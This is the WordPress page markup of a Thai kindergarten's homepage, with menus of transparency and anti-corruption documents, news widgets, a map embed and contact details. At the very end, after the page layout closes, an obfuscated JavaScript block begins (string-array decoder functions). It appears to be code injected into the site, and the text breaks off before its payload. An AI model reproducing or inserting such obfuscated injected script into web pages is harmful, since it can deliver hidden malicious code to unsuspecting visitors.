900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 